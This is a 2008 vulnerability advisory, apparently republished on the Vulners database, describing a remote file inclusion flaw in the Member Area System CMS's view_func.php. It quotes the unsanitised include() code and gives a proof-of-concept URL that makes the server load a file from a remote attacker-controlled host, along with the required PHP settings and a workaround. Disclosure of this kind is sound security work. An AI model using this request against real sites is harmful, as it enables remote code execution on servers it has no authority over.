Vulners
Lucene search
mas-rfi.txt
`----------------------------------------------------------------------
Member Area System (MAS) Remote File Include Vulnerability (view_func.php)
----------------------------------------------------------------------
Author: ShipNX <ship_nx [AT] yahoo com>
Impact: Remote file include
Status: Patch not available
----------------------------------------------------------------------
Software description:
Name: Member Area System (MAS)
Version: Vendor does not disclose version information since v1.7.
Probably later versions are also vulnerable
Vendor: Mansion Productions
Vendor homepage: http://www.mansionproductions.com/
Software homepage: http://www.mansionproductions.com/mas/
Description:
MAS is a leading content management system (CMS) specially designed
for adult-oriented sites managements. It is used on many major adult
sites around the world.
----------------------------------------------------------------------
Vulnerability:
Code: view_func.php
...
$path=dirname($i).'/';
include($path.$l.'/'.'filelist.mas');
...
The variables $i and $l are not properly sanitized
before using them in include() construction.
If Register Globals = On and Allow URL Include (Allow URL Fopen) = On
then an attacker can send the malicious request leading to remote
file include and therefore arbitrary command execution.
---------------------------------------------------------------------
POC:
Conditions:
Register Globals = On
Allow URL fopen (Allow URL include since PHP 5.2.0) = On
http://affectedsite.com/view_func.php?i=http://remotesite.com/justsomedir/&l=testfile.txt?
Note:
justsomedir/ is required here as data passed via $i first gets sent to dirname() function
which will product
$path='http://remotesite.com/';
The remote file should be placed at http://remotesite.com/testfile.txt
----------------------------------------------------------------------
Workaround:
The vendor is aware of the vuln for ages (probably since 2006) so they
recommend setting up Register Globals = Off. Not sure why they haven't
patched the vuln already. If Register Globals is Off on your server, then
you are more or less secure. If it is On, ask your system administrator
to turn it Off. If for some reason you need Register Globals = On on your
site (using old software etc), then contact the vendor and MAYBE they will
finally patch the bug :-)
----------------------------------------------------------------------
History:
Vuln found: Late 2005 :-))
Vendor notified: Seems like the vendor knows of the vuln since 2006, but
for some reason fails to patch the vuln. Maybe they just want it to keep
quiet, or maybe the security matters just don't bother them - not sure.
Anyway, maybe this advisory will finally force them to do patching :-))
Advisory: 11/01/2008
----------------------------------------------------------------------
Thanks to:
DeZender creators :-)
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
11 Jan 2008 00:00Current
7.4High risk
Vulners AI Score7.4